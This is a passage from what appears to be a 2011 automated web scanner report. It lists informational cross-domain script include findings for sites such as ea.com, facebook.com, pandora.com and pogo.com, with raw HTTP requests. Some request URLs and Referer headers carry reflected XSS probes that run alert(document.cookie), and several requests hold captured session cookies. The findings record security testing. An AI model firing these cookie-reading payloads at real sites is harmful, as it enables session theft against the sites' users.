<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...

   <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...

   <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js"> </script>
...[SNIP]...

17.68. http://www.ea.com/mobile previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/mobile

Issue detail

The response dynamically includes the following scripts from other domains:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US
http://widgets.twimg.com/j/2/widget.js

Request

GET /mobile HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 03:07:47 GMT
Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Set-Cookie: symfony=3f7u6pkb5ng23ddteumgngbv25; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 71803

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...

   <script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US" type="text/javascript"></script>
...[SNIP]...

   <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js"> </script>
...[SNIP]...

17.69. http://www.ea.com/platform/online-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/online-games

Issue detail

The response dynamically includes the following script from another domain:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js

Request

GET /platform/online-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.70. http://www.ea.com/platform/pc-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/pc-games

Issue detail

The response dynamically includes the following script from another domain:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js

Request

GET /platform/pc-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.71. http://www.ea.com/platform/ps3-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/ps3-games

Issue detail

The response dynamically includes the following script from another domain:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js

Request

GET /platform/ps3-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.72. http://www.ea.com/platform/xbox-360-games previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/platform/xbox-360-games

Issue detail

The response dynamically includes the following script from another domain:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js

Request

GET /platform/xbox-360-games HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.73. http://www.ea.com/wii previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ea.com
Path:	/wii

Issue detail

The response dynamically includes the following script from another domain:

http://dnn506yrbagrg.cloudfront.net/pages/scripts/0011/0627.js

Request

GET /wii HTTP/1.1
Host: www.ea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.74. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

Response

17.75. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:19:15 GMT
Content-Length: 11443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yT/r/s_GTIq-3cSk.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js"></script>
...[SNIP]...

17.76. http://www.facebook.com/Pogo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Pogo

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

Response

17.77. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Packet-Storm-Security/116613458352817

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

GET /pages/Packet-Storm-Security/116613458352817 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;

Response

17.78. http://www.facebook.com/peanutlabs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/peanutlabs

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

Response

17.79. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

Response

17.80. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

GET /plugins/activity.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

17.81. http://www.facebook.com/plugins/facepile.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/facepile.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

Response

17.82. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;

Response

17.83. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

http://b.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js

Request

Response

17.84. http://www.facebook.com/xd_receiver_v0.4.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/xd_receiver_v0.4.php

Issue detail

The response dynamically includes the following script from another domain:

http://c.static.ak.fbcdn.net/rsrc.php/yF/r/ll3hgnE_kDA.js

Request

GET /xd_receiver_v0.4.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 445
Content-Type: text/html; charset=utf-8
Expires: Sun, 08 Jan 2012 21:19:06 -0800
Pragma:
Connection: close
Date: Sun, 09 Jan 2011 05:19:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Cross-Domain Receiver Pa
...[SNIP]...
</script>
<script src="http://c.static.ak.fbcdn.net/rsrc.php/yF/r/ll3hgnE_kDA.js"
type="text/javascript">
</script>
...[SNIP]...

17.85. http://www.freshnews.com/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc- previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freshnews.com
Path:	/news/388192/peanut-labs-inc-announces-acquisition-e-rewards-inc-

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 05:18:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Set-Cookie: SESSdcb5af41d343fdd786908e4442f98f39=dpp7pp1blldcdp337o15850h97; expires=Tue, 01-Feb-2011 08:52:02 GMT; path=/; domain=.freshnews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 05:18:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

17.86. http://www.freshnews.com/news/3881925a24d%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E29cb609e200/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freshnews.com
Path:	/news/3881925a24d%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E29cb609e200/a

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /news/3881925a24d%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E29cb609e200/a HTTP/1.1
Host: www.freshnews.com
Proxy-Connection: keep-alive
Referer: http://www.freshnews.com/news/3881925a24d%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E29cb609e200/peanut-labs-inc-announces-acquisition-e-rewards-inc-
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSdcb5af41d343fdd786908e4442f98f39=nnfadp4j385gfubjm96r194ob6

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 13:23:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.10
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 09 Jan 2011 13:23:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 34818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

17.87. http://www.gamespot.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.eyewonder.com/100125/767717/1413893/wrapper.js
http://image.gamespotcdn.net/gamespot/www/js/global.min.js?1294179699

Request

GET / HTTP/1.1
Host: www.gamespot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.88. http://www.intellicast.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intellicast.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js

Request

GET / HTTP/1.1
Host: www.intellicast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.89. http://www.intellicast.com/Local/Weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.intellicast.com
Path:	/Local/Weather.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js

Request

GET /Local/Weather.aspx?location=USMI0020 HTTP/1.1
Host: www.intellicast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.90. http://www.mlive.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mlive.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://an.tacoda.net/an/12324/slf.js

Request

GET / HTTP/1.1
Host: www.mlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=1
Expires: Sun, 09 Jan 2011 01:44:45 GMT
Date: Sun, 09 Jan 2011 01:44:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><script type="text/javascri
...[SNIP]...
</script>
<script type="text/javascript" src="http://an.tacoda.net/an/12324/slf.js"></script>
...[SNIP]...

17.91. http://www.pandora.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_companion_ad.js
http://secure.quantserve.com/quant.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

POST / HTTP/1.1
Host: www.pandora.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/login.vm?target=%2Fbackstage
Cache-Control: max-age=0
Origin: http://www.pandora.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.5.10.1294536123
Content-Length: 9

ext_reg=1

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:23:14 GMT
Content-Type: text/html;charset=ISO-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: tc=;Path=/;Domain=.pandora.com;Expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: v2pub=;Path=/;Domain=.pandora.com;Expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ccst=;Path=/;Domain=.pandora.com;Expires=Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 42216


<html>

<script src="/static/contentDirector.js"></script>

<head>
   <title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title>

   <meta name="description" content=
...[SNIP]...
</script>
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php"></script>
...[SNIP]...
</script>

<script language="Javascript" src="http://pagead2.googlesyndication.com/pagead/show_companion_ad.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

17.92. http://www.pandora.com/backstage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/backstage

Issue detail

The response dynamically includes the following script from another domain:

http://secure.quantserve.com/quant.js

Request

GET /backstage HTTP/1.1
Host: www.pandora.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/people/?cf8db%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E09862348e83=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.3.10.1294536123

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:22:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 17017

<html>

<head>

<title>Search for Artists, Songs, Stations and People - Backstage at Pandora </title>

<meta name="description" content="Search for Artists, Songs, Stations and People - Backstage
...[SNIP]...
</script>
<script type="text/javascript" src="//secure.quantserve.com/quant.js"></script>
...[SNIP]...

17.93. http://www.pandora.com/facebook/xd_receiver.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/facebook/xd_receiver.htm

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js?2

Request

GET /facebook/xd_receiver.htm HTTP/1.1
Host: www.pandora.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=ca44798cf7067942a82579c2c720f7dd&extern=0&channel=http%3A%2F%2Fwww.pandora.com%2Ffacebook%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.6.10.1294536123

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:23:23 GMT
Server: Apache
Last-Modified: Tue, 04 Jan 2011 22:58:48 GMT
ETag: "162-4990d3617da00"
Accept-Ranges: bytes
Content-Length: 354
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Cross-Domain Receiver Page 4/
...[SNIP]...
<body>
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js?2" type="text/javascript"></script>
...[SNIP]...

17.94. http://www.pandora.com/login.vm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/login.vm

Issue detail

The response dynamically includes the following script from another domain:

http://secure.quantserve.com/quant.js

Request

Response

17.95. http://www.pandora.com/people/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/people/

Issue detail

The response dynamically includes the following script from another domain:

http://secure.quantserve.com/quant.js

Request

GET /people/ HTTP/1.1
Host: www.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.96. http://www.peanutlabs.com/js/iFrame/sc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/js/iFrame/sc.php

Issue detail

The response dynamically includes the following script from another domain:

https://amch.questionmarket.com/dt/s/25387/0.php

Request

Response

17.97. http://www.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=1;sz=980x50;ord=759632?
http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;ag=af41;g=0;tile=2;sz=300x250;ord=759632?
http://cts.metricsdirect.com/Conversion.aspx?cpid=8184
http://www.java.com/js/deployJava.js

Request

GET / HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536387265-New%7C1297128387265%3B

Response

17.98. http://www.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=180123?
http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=180123?
http://connect.facebook.net/en_US/all.js
http://cts.metricsdirect.com/Conversion.aspx?cpid=8184
http://www.java.com/js/deployJava.js

Request

Response

17.99. http://www.pogo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=1;sz=980x50;ord=511929?
http://ad.doubleclick.net/adj/home.pogo/spotlight;dcopt=ist;g=1;tile=2;sz=300x250;ord=511929?
http://connect.facebook.net/en_US/all.js
http://cts.metricsdirect.com/Conversion.aspx?cpid=8184
http://www.java.com/js/deployJava.js

Request

GET /?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.recent=scrabble.2player.social.17fbdp; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; com.pogo.ga=; op600clubpogogum=a00200200a2719m0337lk0d3e; com.pogo.unid=6606480040153856; com.pogo.nsc=age.:sort.favdown:va.false:scrabble.2player.beginner:; s_cc=true; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536931722-New%7C1297128931722%3B; com.pogo.supressGiftLayer=; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.site=pogo; com.pogo.info=1A06DD6489046E8C5400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04B761D877642A78CFB4C56CAE924D0222579F2238A5B7AFDCAF21A40BDF3AD46495DF9940B114E1282F07B75AC2B359A34804B80F2900E0845400B01BCDC200C5C740894EE1C1D54B9D6337ECAA3BC8AA9E96C90EB8BD479A84B5EAE5F7FFE0276A4654905B9B0F27BA3BCEA9A972CD5BBA61610C9A8736A7BE0F37B01924BD04C8EBFDFE586AD587680A170C3EDC161B48B80C858E980A71; com.pogo.hp.ls.cfg=0; com.pogo.tafrcode=;

Response

17.100. http://www.pogo.com/action/pogo/confirmation.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/confirmation.do

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://cts.metricsdirect.com/Conversion.aspx?cpid=6924
http://cts.metricsdirect.com/Conversion.aspx?cpid=972
http://network.adsmarket.com/cpx?script=1&programid=13835&action=lead&p1=998826224
http://secure.fatracking.com/test-tracking/?page=tracking&id=416G4
http://tracking.etology.com/?value=1&id=45178
http://www.googleadservices.com/pagead/conversion.js

Request

GET /action/pogo/confirmation.do HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/lightregview.do
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
